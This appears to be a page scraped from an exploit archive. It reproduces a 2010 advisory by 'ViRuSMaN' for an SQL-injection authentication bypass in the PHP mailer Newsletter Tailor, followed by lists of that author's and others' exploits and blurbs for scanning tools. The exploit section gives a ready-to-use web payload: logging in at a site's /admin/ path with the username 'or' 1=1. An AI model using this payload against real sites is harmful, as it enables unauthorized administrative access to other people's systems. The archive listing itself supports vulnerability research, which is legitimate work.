Menu

Search for hundreds of thousands of exploits

"NewsLetter Tailor - Authentication Bypass"

Author

Exploit author

ViRuSMaN

Platform

Exploit platform

php

Release date

Exploit published date

2010-02-09

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
==============================================================================
[»] ~ Note : [ Tribute to the martyrs of Gaza . ]
==============================================================================
[»] Newsletter Tailor (Auth Bypass) SQL Injection Vulnerability
==============================================================================

[»] Script: [ Newsletter Tailor ]
[»] Language: [ PHP ]
[»] Site page: [ A powerful Newsletter/ Mass Mailer script with built-in ftp client and wysiwyg editor ]
[»] Download: [ http://sourceforge.net/projects/nlettertailor/ ]
[»] Founder: [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
[»] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com ]
[»] My Home: [ HackTeach.Org , Islam-Attack.Com ]

###########################################################################

===[ Exploit ]===

[»] http://[target].com/[path]/admin/
[~] Username:'or' 1=1
[~] Password:ViRuSMaN


Author: ViRuSMaN <-

###########################################################################
Release Date Title Type Platform Author
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2010-02-26 "FileExecutive 1 - Multiple Vulnerabilities" webapps aix ViRuSMaN
2010-02-23 "QuickDev 4 PHP - Database Disclosure" webapps php ViRuSMaN
2010-02-22 "phpBugTracker 1.0.1 - File Disclosure" webapps php ViRuSMaN
2010-02-22 "vBSEO 3.1.0 - Local File Inclusion" webapps php ViRuSMaN
2010-02-20 "FlatFile Login System - Remote Password Disclosure" webapps php ViRuSMaN
2010-02-20 "TimeClock 0.99 - Cross-Site Request Forgery (Add Admin)" webapps php ViRuSMaN
2010-02-20 "Netzbrett - Database Disclosure" webapps php ViRuSMaN
2010-02-13 "ZeusCMS 0.2 - Database Backup Dump / Local File Inclusion" webapps php ViRuSMaN
2010-02-11 "myPHP Guestbook 2.0.4 - Database Backup Dump" webapps php ViRuSMaN
2010-02-09 "NewsLetter Tailor - Authentication Bypass" webapps php ViRuSMaN
2010-02-09 "NewsLetter Tailor - Database Backup Dump" webapps php ViRuSMaN
2010-02-09 "fipsForum 2.6 - Remote Database Disclosure" webapps asp ViRuSMaN
2010-01-23 "OpenDb 1.5.0.4 - Multiple Local File Inclusions" webapps php ViRuSMaN
2010-01-15 "Triburom - 'forum.php' Cross-Site Scripting" webapps php ViRuSMaN
2010-01-14 "Joomla! Component com_marketplace 1.2 - 'catid' Cross-Site Scripting" webapps php ViRuSMaN
2010-01-14 "Xforum 1.4 - 'nbpageliste' Cross-Site Scripting" webapps php ViRuSMaN
2010-01-13 "Tribisur - 'cat' Cross-Site Scripting" webapps php ViRuSMaN
2010-01-10 "Egreetings 1.0b - Remote Database Disclosure" webapps asp ViRuSMaN
2010-01-10 "ABB 1.1 - Forum Remote Database Disclosure" webapps asp ViRuSMaN
2010-01-10 "DigitalHive - 'mt' Cross-Site Scripting" webapps php ViRuSMaN
2010-01-10 "E-membres 1.0 - Remote Database Disclosure" webapps asp ViRuSMaN
2009-12-27 "Joomla! Component com_dhforum - SQL Injection" webapps php ViRuSMaN
2009-12-24 "Snitz Forums 2000 - Database Disclosure" webapps asp ViRuSMaN
2009-12-24 "Web Wiz Forums 9.64 - Database Disclosure" webapps asp ViRuSMaN
2009-12-24 "Web Wiz NewsPad - Database Disclosure" webapps asp ViRuSMaN
2009-12-19 "Toast Forums 1.8 - Database Disclosure" webapps asp ViRuSMaN
2009-12-16 "GuestBookPro Script - Remote Database Disclosure" webapps asp ViRuSMaN
2009-12-16 "Codefixer Membership - Remote Database Disclosure" webapps asp ViRuSMaN
2009-12-14 "NAS Uploader 1.0/1.5 - Arbitrary File Upload" webapps linux ViRuSMaN
2009-12-14 "[WS] upload - Arbitrary File Upload" webapps linux ViRuSMaN
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.